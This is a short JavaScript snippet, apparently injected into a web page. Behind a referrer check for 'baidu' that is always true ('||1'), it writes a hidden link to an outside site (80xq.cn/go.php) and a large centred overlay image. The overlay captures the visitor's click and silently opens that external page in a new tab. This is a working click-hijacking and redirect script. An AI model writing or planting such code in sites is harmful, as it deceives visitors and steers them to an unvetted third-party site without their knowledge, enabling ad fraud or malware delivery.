
var pattern = /baidu/gi;
var keyValue=escape(document.referrer);
if (pattern.exec(keyValue)||1)
{
document.writeln("<a href=\"http:\/\/www.80xq.cn\/go.php?bid=1\" id=\"go\" style=\"display:none\" target=\"_blank\"> <\/a>");
document.writeln("<div  id=\"sbox\" style=\"position: absolute; width: 441px; height: 128px; z-index: 100;background-image: url(\/fav.gif);cursor:pointer;\" onclick=\"go();\"><\/div>");

	var o = document.getElementById("sbox");
	o.style.left = (screen.width - 450) / 2;
    o.style.top = (screen.height - 263-100) / 2;
	function go(){
		var o = document.getElementById("sbox");
		o.style.display="none";
		var anchor=document.getElementById("go");
		if(anchor)anchor.click();
	}
}
